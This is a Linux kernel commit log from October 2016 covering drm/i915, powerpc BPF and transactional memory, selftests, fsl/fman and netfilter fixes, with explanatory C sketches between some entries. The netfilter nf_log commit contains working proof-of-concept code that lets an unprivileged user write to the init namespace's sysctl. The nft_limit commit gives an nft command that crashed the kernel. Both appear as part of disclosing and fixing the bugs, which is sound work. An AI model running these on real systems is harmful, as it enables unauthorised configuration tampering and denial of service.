Age    Commit message    Author
2016-10-04drm/i915: Use binary search when looking up forcewake domainsTvrtko Ursulin
Instead of the existing linear search, now that we have sorted range tables, we can do a binary search on them for some potentially minuscule performance gain, but more importantly for elegance and code size. Hopefully the performance gain is sufficient to offset the function calls which were not there before. v2: Removed const cast away. Signed-off-by: Tvrtko Ursulin <tvrtko.ursulin@intel.com> Reviewed-by: Chris Wilson <chris@chris-wilson.co.uk>
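A minimal standalone sketch of the idea, with a made-up range table; the real i915 table, domain bits and helper names differ:

    #include <stdlib.h>

    struct fw_range { unsigned int start, end, domains; };

    /* must be sorted by .start and non-overlapping for bsearch() to work */
    static const struct fw_range ranges[] = {
        { 0x2000, 0x3fff, 0x1 },
        { 0x8000, 0x9fff, 0x2 },
    };

    static int cmp_range(const void *key, const void *elem)
    {
        unsigned int offset = *(const unsigned int *)key;
        const struct fw_range *r = elem;

        if (offset < r->start)
            return -1;
        if (offset > r->end)
            return 1;
        return 0;
    }

    static unsigned int lookup_fw_domains(unsigned int offset)
    {
        const struct fw_range *r;

        r = bsearch(&offset, ranges, sizeof(ranges) / sizeof(ranges[0]),
                    sizeof(ranges[0]), cmp_range);
        return r ? r->domains : 0;   /* 0: no forcewake needed */
    }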
2016-10-04drm/i915: Sort forcewake mapping tablesTvrtko Ursulin
Sorting the tables (verified at runtime to help during development) is another prerequisite for interesting work which will follow. v2: * Remove the cast-away of const and improve comments. (Chris Wilson) * Check tables only when debug option is enabled. v3: Use IS_ENABLED. (Chris Wilson) Signed-off-by: Tvrtko Ursulin <tvrtko.ursulin@intel.com> Reviewed-by: Chris Wilson <chris@chris-wilson.co.uk>
2016-10-04drm/i915: Data driven register to forcewake domains lookupTvrtko Ursulin
Move finding the correct forcewake domains to take for register access from code to a mapping table. This will allow more interesting work in the following patches and is easier to review if singled out early. Signed-off-by: Tvrtko Ursulin <tvrtko.ursulin@intel.com> Reviewed-by: Chris Wilson <chris@chris-wilson.co.uk>
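The lookup introduced here is a plain linear walk of such a table; the binary search in the entry above replaces it later. Reusing the illustrative struct fw_range table sketched above:

    static unsigned int find_fw_domains_linear(unsigned int offset)
    {
        unsigned int i;

        for (i = 0; i < sizeof(ranges) / sizeof(ranges[0]); i++)
            if (offset >= ranges[i].start && offset <= ranges[i].end)
                return ranges[i].domains;

        return 0;
    }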
2016-10-04drm/i915: Do not inline forcewake taking in mmio accessorsTvrtko Ursulin
Once we know we need to take new forcewakes, that being a slow operation, it does not make sense to inline that code into every mmio accessor. Move it to a separate function and save some code. v2: Be explicit with noinline and remove stale comment. (Chris Wilson) Signed-off-by: Tvrtko Ursulin <tvrtko.ursulin@intel.com> Reviewed-by: Chris Wilson <chris@chris-wilson.co.uk>
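A rough sketch of the shape of the change (names are illustrative, not the exact i915 symbols): only the cheap lookup stays in the accessor, while the slow wake-up path is explicitly kept out of line.

    static noinline void fw_domains_get_slow(unsigned int fw_domains)
    {
        /* actually wake each requested domain; slow, so not inlined */
    }

    static inline unsigned int read_reg(unsigned int offset)
    {
        unsigned int fw = lookup_fw_domains(offset);  /* from the sketch above */

        if (fw)                       /* cheap check stays in the accessor */
            fw_domains_get_slow(fw);  /* slow path lives out of line */

        return 0;                     /* the actual mmio read would go here */
    }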
2016-10-04drm/i915: Keep track of active forcewake domains in a bitmaskTvrtko Ursulin
There are currently places in the code, and there will be more in the future, which iterate the forcewake domains to find out which ones are currently active. To save them from doing this iteration, we can cheaply keep a mask of active domains in dev_priv->uncore.fw_domains_active. This has no cost in terms of object size; it even manages to shrink it overall by 368 bytes on my config. Signed-off-by: Tvrtko Ursulin <tvrtko.ursulin@intel.com> Cc: "Paneri, Praveen" <praveen.paneri@intel.com> Reviewed-by: Chris Wilson <chris@chris-wilson.co.uk>
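In rough terms (a standalone sketch, with names and types simplified from the real uncore code), the get/put paths keep the mask in sync so other code can test it instead of iterating all domains:

    static unsigned int fw_domains_active;       /* bit set while a domain is awake */

    static void fw_domains_get(unsigned int fw_domains)
    {
        /* ... wake each domain requested in fw_domains ... */
        fw_domains_active |= fw_domains;
    }

    static void fw_domains_put(unsigned int fw_domains)
    {
        /* ... release each domain in fw_domains ... */
        fw_domains_active &= ~fw_domains;
    }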
2016-10-04drm/i915: Remove redundant hsw_write* mmio functionsTvrtko Ursulin
They are completely identical to gen6_write* ones. Signed-off-by: Tvrtko Ursulin <tvrtko.ursulin@intel.com> Reviewed-by: Joonas Lahtinen <joonas.lahtinen@linux.intel.com> Reviewed-by: Chris Wilson <chris@chris-wilson.co.uk>
2016-10-04drm/i915: workaround sparse warning on variable length arraysJani Nikula
Fix sparse warning: drivers/gpu/drm/i915/intel_device_info.c:195:31: warning: Variable length array is used. In truth the array does have constant length, but sparse is too dumb to realize. This is a bit ugly, but silence the warning no matter what. Fixes: 91bedd34abf0 ("drm/i915/bdw: Check for slice, subslice and EU count for BDW") Reviewed-by: Joonas Lahtinen <joonas.lahtinen@linux.intel.com> Signed-off-by: Jani Nikula <jani.nikula@intel.com> Link: http://patchwork.freedesktop.org/patch/msgid/1475574853-4178-1-git-send-email-jani.nikula@intel.com
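The pattern sparse trips over looks roughly like the first function below; replacing the const-qualified variable with a true integer constant expression (a #define or enum) is the usual way to quiet it. Names here are illustrative, not the exact i915 code.

    void warns(void)
    {
        const int ss_max = 3;
        unsigned char eu_cnt[ss_max];  /* technically a VLA in C, so sparse warns,
                                        * even though the length is really constant */
        eu_cnt[0] = 0;
    }

    #define SS_MAX 3

    void silent(void)
    {
        unsigned char eu_cnt[SS_MAX];  /* integer constant expression: no warning */
        eu_cnt[0] = 0;
    }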
2016-10-04powerpc/bpf: Add support for bpf constant blindingNaveen N. Rao
In line with similar support for other architectures by Daniel Borkmann. 'MOD Default X' from test_bpf without constant blinding: 84 bytes emitted from JIT compiler (pass:3, flen:7) d0000000058a4688 + <x>: 0: nop 4: nop 8: std r27,-40(r1) c: std r28,-32(r1) 10: xor r8,r8,r8 14: xor r28,r28,r28 18: mr r27,r3 1c: li r8,66 20: cmpwi r28,0 24: bne 0x0000000000000030 28: li r8,0 2c: b 0x0000000000000044 30: divwu r9,r8,r28 34: mullw r9,r28,r9 38: subf r8,r9,r8 3c: rotlwi r8,r8,0 40: li r8,66 44: ld r27,-40(r1) 48: ld r28,-32(r1) 4c: mr r3,r8 50: blr ... and with constant blinding: 140 bytes emitted from JIT compiler (pass:3, flen:11) d00000000bd6ab24 + <x>: 0: nop 4: nop 8: std r27,-40(r1) c: std r28,-32(r1) 10: xor r8,r8,r8 14: xor r28,r28,r28 18: mr r27,r3 1c: lis r2,-22834 20: ori r2,r2,36083 24: rotlwi r2,r2,0 28: xori r2,r2,36017 2c: xoris r2,r2,42702 30: rotlwi r2,r2,0 34: mr r8,r2 38: rotlwi r8,r8,0 3c: cmpwi r28,0 40: bne 0x000000000000004c 44: li r8,0 48: b 0x000000000000007c 4c: divwu r9,r8,r28 50: mullw r9,r28,r9 54: subf r8,r9,r8 58: rotlwi r8,r8,0 5c: lis r2,-17137 60: ori r2,r2,39065 64: rotlwi r2,r2,0 68: xori r2,r2,39131 6c: xoris r2,r2,48399 70: rotlwi r2,r2,0 74: mr r8,r2 78: rotlwi r8,r8,0 7c: ld r27,-40(r1) 80: ld r28,-32(r1) 84: mr r3,r8 88: blr Signed-off-by: Naveen N. Rao <naveen.n.rao@linux.vnet.ibm.com> Acked-by: Daniel Borkmann <daniel@iogearbox.net> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04powerpc/bpf: Implement support for tail callsNaveen N. Rao
Tail calls allow JIT'ed eBPF programs to call into other JIT'ed eBPF programs. This can be achieved either by: (1) retaining the stack setup by the first eBPF program and having all subsequent eBPF programs re-use it, or, (2) by unwinding/tearing down the stack and having each eBPF program deal with its own stack as it sees fit. To ensure that this does not create loops, there is a limit to how many tail calls can be done (currently 32). This requires the JIT'ed code to maintain a count of the number of tail calls done so far. Approach (1) is simple, but requires every eBPF program to have (almost) the same prologue/epilogue, regardless of whether they need it. This is inefficient for small eBPF programs, which sometimes may not need a prologue at all. As such, to minimize the impact of the tail call implementation, we use approach (2) here, which needs each eBPF program in the chain to use its own prologue/epilogue. This is not ideal when many tail calls are involved and when all the eBPF programs in the chain have similar prologue/epilogue. However, the impact is restricted to programs that do tail calls. Individual eBPF programs are not affected. We maintain the tail call count in a fixed location on the stack and updated tail call count values are passed in through this. The very first eBPF program in a chain sets this to 0 (the first 2 instructions). Subsequent tail calls skip the first two eBPF JIT instructions to maintain the count. For programs that don't do tail calls themselves, the first two instructions are NOPs. Signed-off-by: Naveen N. Rao <naveen.n.rao@linux.vnet.ibm.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
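A small C model of the guard logic the JIT emits before taking a tail call (a sketch only; the real code emits ppc64 instructions and then branches into the target program's body, skipping its count-initialising prologue instructions):

    #define MAX_TAIL_CALL_CNT 32

    static int tail_call_allowed(unsigned int index, unsigned int max_entries,
                                 unsigned int *tail_call_cnt)
    {
        if (index >= max_entries)
            return 0;                       /* fall through: no such program */
        if (*tail_call_cnt >= MAX_TAIL_CALL_CNT)
            return 0;                       /* chain too long: give up */
        (*tail_call_cnt)++;                 /* count lives in a fixed stack slot */
        return 1;                           /* ok to jump into the target program */
    }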
2016-10-04powerpc/bpf: Introduce accessors for using the tmp local stack spaceNaveen N. Rao
While at it, ensure that the location of the local save area is consistent whether or not we setup our own stackframe. This property is utilised in the next patch that adds support for tail calls. Signed-off-by: Naveen N. Rao <naveen.n.rao@linux.vnet.ibm.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04powerpc/fadump: Fix build break when CONFIG_PROC_VMCORE=nMichael Ellerman
The fadump code calls vmcore_cleanup() which only exists if CONFIG_PROC_VMCORE=y. We don't want to depend on CONFIG_PROC_VMCORE, because it's user selectable, so just wrap the call in an #ifdef. Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
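The fix is the usual conditional-compilation guard; a sketch of the pattern (the surrounding fadump function is not shown):

    #ifdef CONFIG_PROC_VMCORE
        vmcore_cleanup();
    #endif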
2016-10-04powerpc: tm: Enable transactional memory (TM) lazily for userspaceCyril Bur
Currently the MSR TM bit is always set if the hardware is TM capable. This adds extra overhead as it means the TM SPRs (TFHAR, TEXASR and TFIAR) must be swapped for each process regardless of whether they use TM. For processes that don't use TM the TM MSR bit can be turned off, allowing the kernel to avoid the expensive swap of the TM registers. A TM unavailable exception will occur if a thread does use TM, at which point the kernel will enable MSR_TM and leave it set for some time afterwards. Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
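A conceptual sketch of the saving this enables on context switch (not the exact powerpc switch code, though the SPR and field names below do exist in the kernel): threads that never took the TM-unavailable exception still have MSR_TM clear, so the SPR swap is skipped entirely.

    static void save_tm_sprs_lazily(struct thread_struct *t, unsigned long msr)
    {
        if (!(msr & MSR_TM))
            return;                         /* thread never used TM: nothing to swap */

        t->tm_tfhar  = mfspr(SPRN_TFHAR);
        t->tm_texasr = mfspr(SPRN_TEXASR);
        t->tm_tfiar  = mfspr(SPRN_TFIAR);
    }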
2016-10-04powerpc/tm: Add TM Unavailable ExceptionCyril Bur
If the kernel disables transactional memory (TM) and userspace still tries TM-related actions (TM instructions or TM SPR accesses), TM-aware hardware will cause the kernel to take a facility unavailable exception. Add checks for the exception being caused by illegal TM access in userspace. Signed-off-by: Cyril Bur <cyrilbur@gmail.com> [mpe: Rewrite comment entirely, bugs in it are mine] Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04powerpc: Remove do_load_up_transact_{fpu,altivec}Cyril Bur
A previous rework of the TM code left these functions unused. Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04powerpc: tm: Rename transct_(*) to ck(\1)_stateCyril Bur
Name the structures used for checkpointed state consistently with pt_regs/ckpt_regs. Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04powerpc: tm: Always use fp_state and vr_state to store live registersCyril Bur
There is currently an inconsistency as to how the entire CPU register state is saved and restored when a thread uses transactional memory (TM). Using transactional memory results in the CPU having duplicated (almost) all of its register state. This duplication results in a set of registers which can be considered 'live', those being currently modified by the instructions being executed, and another set that is frozen at a point in time. On context switch, both sets of state have to be saved and (later) restored. These two states are often called a variety of different things. Common terms for the state which only exists after the CPU has entered a transaction (performed a TBEGIN instruction) in hardware are 'transactional' or 'speculative'. Between a TBEGIN and a TEND or TABORT (or an event that causes the hardware to abort), regardless of the use of TSUSPEND, the transactional state can be referred to as the live state. The second state is often referred to as the 'checkpointed' state and is a duplication of the live state when the TBEGIN instruction is executed. This state is kept in the hardware and will be rolled back to on transaction failure. Currently all the registers stored in pt_regs are ALWAYS the live registers, that is, when a thread has transactional registers their values are stored in pt_regs and the checkpointed state is in ckpt_regs. A strange opposite is true for fp_state/vr_state. When a thread is non-transactional fp_state/vr_state holds the live registers. When a thread has initiated a transaction fp_state/vr_state holds the checkpointed state and transact_fp/transact_vr become the structures which hold the live state (at this point it is a transactional state). This method creates confusion as to where the live state is; in some circumstances it requires extra work to determine where to put the live state, and it prevents the use of common functions designed (probably before TM) to save the live state. With this patch pt_regs, fp_state and vr_state all represent the same thing and the other structures [pending rename] are for checkpointed state. Acked-by: Simon Guo <wei.guo.simon@gmail.com> Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04selftests/powerpc: Add checks for transactional VSXs in signal contextsCyril Bur
If a thread receives a signal while transactional the kernel creates a second context to show the transactional state of the process. This test loads some known values and waits for a signal and confirms that the expected values are in the signal context. Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04selftests/powerpc: Add checks for transactional VMXs in signal contextsCyril Bur
If a thread receives a signal while transactional the kernel creates a second context to show the transactional state of the process. This test loads some known values and waits for a signal and confirms that the expected values are in the signal context. Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04selftests/powerpc: Add checks for transactional FPUs in signal contextsCyril Bur
If a thread receives a signal while transactional the kernel creates a second context to show the transactional state of the process. This test loads some known values and waits for a signal and confirms that the expected values are in the signal context. Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04selftests/powerpc: Add checks for transactional GPRs in signal contextsCyril Bur
If a thread receives a signal while transactional the kernel creates a second context to show the transactional state of the process. This test loads some known values and waits for a signal and confirms that the expected values are in the signal context. Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04selftests/powerpc: Check that signals always get deliveredCyril Bur
Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04selftests/powerpc: Add TM tcheck helpers in CCyril Bur
Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04selftests/powerpc: Allow tests to extend their kill timeoutCyril Bur
Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04selftests/powerpc: Introduce GPR asm helper header fileCyril Bur
Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04selftests/powerpc: Move VMX stack frame macros to header fileCyril Bur
Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04selftests/powerpc: Rework FPU stack placement macros and move to header fileCyril Bur
The FPU regs are placed at the top of the stack frame. Currently the position is expected to be passed to the macros. The macros should now be passed the stack frame size, from which they can calculate where to put the regs; this makes them simpler to use. Also move them to a header file so they can be used in a different area of the powerpc selftests. Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04selftests/powerpc: Check for VSX preservation across userspace preemptionCyril Bur
Ensure the kernel switches VSX registers correctly. VSX registers are all volatile, and despite the kernel preserving VSX across syscalls, it doesn't have to. Test that during interrupts and timeslices ending the VSX regs remain the same. Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04drm/i915: keep CONFIG_DRM_FBDEV_EMULATION=n function stubs togetherJani Nikula
Move the outcast intel_fbdev_output_poll_changed() stub for CONFIG_DRM_FBDEV_EMULATION=n next to its friends. Reviewed-by: Chris Wilson <chris@chris-wilson.co.uk> Signed-off-by: Jani Nikula <jani.nikula@intel.com> Link: http://patchwork.freedesktop.org/patch/msgid/1475567628-5529-1-git-send-email-jani.nikula@intel.com
2016-10-04Merge tag 'perf-core-for-mingo-20161003' of ↵Ingo Molnar
git://git.kernel.org/pub/scm/linux/kernel/git/acme/linux into perf/urgent Pull perf/core improvements and fixes: - Allow vendors to provide JSON files describing PMU events, that then get parsed to generate C tables that are linked against perf, allowing the use of the names in their documentations, such as: # perf list l1d List of pre-defined events (to be used in -e): Cache: l1d.replacement [L1D data line replacements] l1d_pend_miss.fb_full [Cycles a demand request was blocked due to Fill Buffers inavailability] l1d_pend_miss.pending [L1D miss oustandings duration in cycles] l1d_pend_miss.pending_cycles [Cycles with L1D load Misses outstanding] l1d_pend_miss.pending_cycles_any [Cycles with L1D load Misses outstanding from any thread on physical core] l2_trans.l1d_wb [L1D writebacks that access L2 cache] Pipeline: cycle_activity.cycles_l1d_miss [Cycles while L1 cache miss demand load is outstanding] cycle_activity.cycles_l1d_pending [Cycles while L1 cache miss demand load is outstanding] cycle_activity.stalls_l1d_miss [Execution stalls while L1 cache miss demand load is outstanding] cycle_activity.stalls_l1d_pending [Execution stalls while L1 cache miss demand load is outstanding] The above example was done on a Broadwell based ThinkPad t450s after downloading and installing such JSON files which will be added to the tools/perf/pmu-events/ directory in a subsequent patchkit. Now one can use those names with -e/--event in all 'perf tools'. (Andi Kleen, Sukadev Bhattiprolu) - Add a missing pointer dereference in 'perf probe' (Colin Ian King) - Add support for building host programs to be used in generating files to be used in the build process, such as fixdep and jevents, fixing the usage of these features in a cross compilation setup (Jiri Olsa) Signed-off-by: Arnaldo Carvalho de Melo <acme@redhat.com> Signed-off-by: Ingo Molnar <mingo@kernel.org>
2016-10-04Revert "sched/core: Do not use smp_processor_id() with preempt enabled in ↵Ingo Molnar
smpboot_thread_fn()" This reverts commit 4fa5cd5245b627db88c9ca08ae442373b02596b4. The original change widens a preempt-off section, to avoid a seemingly unsafe smp_processor_id() use. During review I overlooked two facts: - The code calls a non-trivial function callback: ht->park(td->cpu); ... which might (and does occasionally) sleep, triggering the warning. - More importantly, as pointed out by Peter Zijlstra, using smp_processor_id() in that context is safe, if it's done from a kernel thread that is pinned to a single CPU - which is the case here. So revert to the original code that enables preemption sooner. Reported-by: kernel test robot <xiaolong.ye@intel.com> Acked-by: Peter Zijlstra <peterz@infradead.org> Cc: Con Kolivas <kernel@kolivas.org> Cc: Alfred Chen <cchalpha@gmail.com> Link: http://lkml.kernel.org/r/20160930015102.GB20189@yexl-desktop Signed-off-by: Ingo Molnar <mingo@kernel.org>
2016-10-04Merge remote-tracking branch 'net-next/master' into mac80211-nextJohannes Berg
Resolve the merge conflict between Felix's/my and Toke's patches coming into the tree through net and mac80211-next respectively. Most of Felix's changes go away due to Toke's new infrastructure work, my patch changes to "goto begin" (the label wasn't there before) instead of returning NULL so flow control towards drivers is preserved better. Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-04MAINTAINERS: net: add entry for Freescale QorIQ DPAA FMan driverMadalin Bucur
Add a record for the Freescale QorIQ DPAA FMan driver, adding myself as maintainer. Signed-off-by: Madalin Bucur <madalin.bucur@nxp.com>
2016-10-04fsl/fman: remove leftover commentMadalin Bucur
Signed-off-by: Madalin Bucur <madalin.bucur@nxp.com>
2016-10-04netfilter: nft_limit: fix divided by zero panicLiping Zhang
After I input the following nftables rule, a panic happened on my system: # nft add rule filter OUTPUT limit rate 0xf00000000 bytes/second divide error: 0000 [#1] SMP [ ... ] RIP: 0010:[<ffffffffa059035e>] [<ffffffffa059035e>] nft_limit_pkt_bytes_eval+0x2e/0xa0 [nft_limit] Call Trace: [<ffffffffa05721bb>] nft_do_chain+0xfb/0x4e0 [nf_tables] [<ffffffffa044f236>] ? nf_nat_setup_info+0x96/0x480 [nf_nat] [<ffffffff81753767>] ? ipt_do_table+0x327/0x610 [<ffffffffa044f677>] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat] [<ffffffffa058b21f>] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4] [<ffffffff816f4aa2>] nf_iterate+0x62/0x80 [<ffffffff816f4b33>] nf_hook_slow+0x73/0xd0 [<ffffffff81703d0d>] __ip_local_out+0xcd/0xe0 [<ffffffff81701d90>] ? ip_forward_options+0x1b0/0x1b0 [<ffffffff81703d3c>] ip_local_out+0x1c/0x40 This is because the divisor is 64-bit, but we treat it as a 32-bit integer, so 0xf00000000 becomes zero, i.e. the divisor becomes 0. Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
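The truncation is easy to reproduce in isolation; with a 32-bit variable the rate above collapses to zero, and that zero is what the eval path later divides by:

    #include <stdint.h>
    #include <stdio.h>

    int main(void)
    {
        uint64_t rate = 0xf00000000ULL;  /* limit rate from the rule above */
        uint32_t divisor = rate;         /* keeps only the low 32 bits: 0 */

        printf("%u\n", divisor);         /* prints 0 */
        return 0;
    }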
2016-10-04netfilter: fix namespace handling in nf_log_proc_dostringJann Horn
nf_log_proc_dostring() used current's network namespace instead of the one corresponding to the sysctl file the write was performed on. Because the permission check happens at open time and the nf_log files in namespaces are accessible for the namespace owner, this can be abused by an unprivileged user to effectively write to the init namespace's nf_log sysctls. Stash the "struct net *" in extra2 - data and extra1 are already used. Repro code: #define _GNU_SOURCE #include <stdlib.h> #include <sched.h> #include <err.h> #include <sys/mount.h> #include <sys/types.h> #include <sys/wait.h> #include <fcntl.h> #include <unistd.h> #include <string.h> #include <stdio.h> char child_stack[1000000]; uid_t outer_uid; gid_t outer_gid; int stolen_fd = -1; void writefile(char *path, char *buf) { int fd = open(path, O_WRONLY); if (fd == -1) err(1, "unable to open thing"); if (write(fd, buf, strlen(buf)) != strlen(buf)) err(1, "unable to write thing"); close(fd); } int child_fn(void *p_) { if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC, NULL)) err(1, "mount"); /* Yes, we need to set the maps for the net sysctls to recognize us * as namespace root. */ char buf[1000]; sprintf(buf, "0 %d 1\n", (int)outer_uid); writefile("/proc/1/uid_map", buf); writefile("/proc/1/setgroups", "deny"); sprintf(buf, "0 %d 1\n", (int)outer_gid); writefile("/proc/1/gid_map", buf); stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY); if (stolen_fd == -1) err(1, "open nf_log"); return 0; } int main(void) { outer_uid = getuid(); outer_gid = getgid(); int child = clone(child_fn, child_stack + sizeof(child_stack), CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL); if (child == -1) err(1, "clone"); int status; if (wait(&status) != child) err(1, "wait"); if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) errx(1, "child exit status bad"); char *data = "NONE"; if (write(stolen_fd, data, strlen(data)) != strlen(data)) err(1, "write"); return 0; } Repro: $ gcc -Wall -o attack attack.c -std=gnu99 $ cat /proc/sys/net/netfilter/nf_log/2 nf_log_ipv4 $ ./attack $ cat /proc/sys/net/netfilter/nf_log/2 NONE Because this looks like an issue with very low severity, I'm sending it to the public list directly. Signed-off-by: Jann Horn <jann@thejh.net> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
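The fix direction described above, sketched as two fragments (not the exact patch): remember which network namespace the sysctl table belongs to when it is registered, and use that in the handler rather than the namespace of the writing process.

    /* when setting up the per-netns nf_log sysctl table: */
    table[i].extra2 = net;                     /* data and extra1 are taken */

    /* in nf_log_proc_dostring(): */
    struct net *net = table->extra2;           /* not current's namespace */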
2016-10-04fsl/fman: fix return value checkingMadalin Bucur
Signed-off-by: Madalin Bucur <madalin.bucur@nxp.com>
2016-10-04fsl/fman: simplify redundant conditionMadalin Bucur
Change suggested by David Binderman, thanks. Signed-off-by: Madalin Bucur <madalin.bucur@nxp.com>
2016-10-04fsl/fman: check of_get_phy_mode() return valueMadalin Bucur
For unknown compatibles avoid crashing and default to SGMII. Signed-off-by: Madalin Bucur <madalin.bucur@nxp.com>
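The guard is the usual devicetree pattern; a sketch (mac_node stands in for whatever node the real probe code uses, and error handling is omitted):

    phy_interface_t phy_if;
    int err;

    err = of_get_phy_mode(mac_node);           /* returns the mode or -errno */
    if (err < 0)
        phy_if = PHY_INTERFACE_MODE_SGMII;     /* unknown compatible: fall back */
    else
        phy_if = err;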
2016-10-04fsl/fman: check pcsphy pointer before useMadalin Bucur
Signed-off-by: Madalin Bucur <madalin.bucur@nxp.com>
2016-10-04fsl/fman: MEMAC may use QSGMII PHY interface modeMadalin Bucur
Signed-off-by: Madalin Bucur <madalin.bucur@nxp.com>
2016-10-04fsl/fman: return a phy_dev pointer from initMadalin Bucur
Signed-off-by: Madalin Bucur <madalin.bucur@nxp.com>
2016-10-04fsl/fman: simplify device tree readsMadalin Bucur
Signed-off-by: Madalin Bucur <madalin.bucur@nxp.com>
2016-10-04fsl/fman: use of_get_phy_mode()Madalin Bucur
Signed-off-by: Madalin Bucur <madalin.bucur@freescale.com>
2016-10-04fsl/fman: small fixesMadalin Bucur
Make module params static, add proper NULL checks, and remove the __iomem label where misused. Signed-off-by: Madalin Bucur <madalin.bucur@freescale.com>
2016-10-04fsl/fman: fix loadable module compilationIgal Liberman
Signed-off-by: Igal Liberman <igal.liberman@freescale.com>
2016-10-04fsl/fman: split lines over 80 charactersMadalin Bucur
Signed-off-by: Madalin Bucur <madalin.bucur@nxp.com>
2016-10-04drm/rockchip: analogix_dp: Refuse to enable PSR if panel doesn't support itTomeu Vizoso
There's no point in enabling PSR when the panel doesn't support it. This also avoids a problem when PSR gets enabled when a CRTC is being disabled, because sometimes in that situation the DSP_HOLD_VALID_INTR interrupt on which we wait will never arrive. This was observed on RK3288 with a panel without PSR (veyron-jaq Chromebook). It's very easy to reproduce by running the kms_rmfb test in IGT a few times. Cc: Yakir Yang <ykk@rock-chips.com> Reviewed-by: Sean Paul <seanpaul@chromium.org> Signed-off-by: Tomeu Vizoso <tomeu.vizoso@collabora.com> Signed-off-by: Archit Taneja <architt@codeaurora.org> Link: http://patchwork.freedesktop.org/patch/msgid/1474639600-30090-2-git-send-email-tomeu.vizoso@collabora.com
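The guard presumably ends up as something like the following in the PSR enable path (a sketch only, using the helper added by the analogix_dp patch below; the argument name and exact signature are assumptions):

    if (!analogix_dp_psr_supported(dp_dev))
        return;    /* panel has no PSR support: don't try to enable it */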
2016-10-04drm/bridge: analogix_dp: Add analogix_dp_psr_supportedTomeu Vizoso
So users know whether PSR should be enabled or not. Cc: Yakir Yang <ykk@rock-chips.com> Reviewed-by: Sean Paul <seanpaul@chromium.org> Signed-off-by: Tomeu Vizoso <tomeu.vizoso@collabora.com> Signed-off-by: Archit Taneja <architt@codeaurora.org> Link: http://patchwork.freedesktop.org/patch/msgid/1474639600-30090-1-git-send-email-tomeu.vizoso@collabora.com
2016-10-04drm/fb-helper: add DRM_FB_HELPER_DEFAULT_OPS for fb_opsStefan Christ
The define DRM_FB_HELPER_DEFAULT_OPS provides the drm_fb_helper default implementations for functions in struct fb_ops. A drm driver can use it like: static struct fb_ops drm_fbdev_cma_ops = { .owner = THIS_MODULE, DRM_FB_HELPER_DEFAULT_OPS, /* driver specific implementations */ }; Suggested-by: Daniel Vetter <daniel@ffwll.ch> Signed-off-by: Stefan Christ <contact@stefanchrist.eu> Reviewed-by: Gustavo Padovan <gustavo.padovan@collabora.co.uk> Signed-off-by: Daniel Vetter <daniel.vetter@ffwll.ch> Link: http://patchwork.freedesktop.org/patch/msgid/1475182136-15191-2-git-send-email-contact@stefanchrist.eu
2016-10-04drm: Document caveats around atomic event handlingDaniel Vetter
It's not that obvious how a driver should handle races between the atomic commit and the completion event. And there's unfortunately a pile of drivers with rather bad event handling which point people in the wrong direction. Try to remedy this by documenting everything better. v2: Typo fixes Alex spotted. v3: More typos Alex spotted. Cc: Andrzej Hajda <a.hajda@samsung.com> Cc: Alex Deucher <alexdeucher@gmail.com> Reviewed-by: Alex Deucher <alexander.deucher@amd.com> Signed-off-by: Daniel Vetter <daniel.vetter@intel.com> Link: http://patchwork.freedesktop.org/patch/msgid/1475229896-6047-1-git-send-email-daniel.vetter@ffwll.ch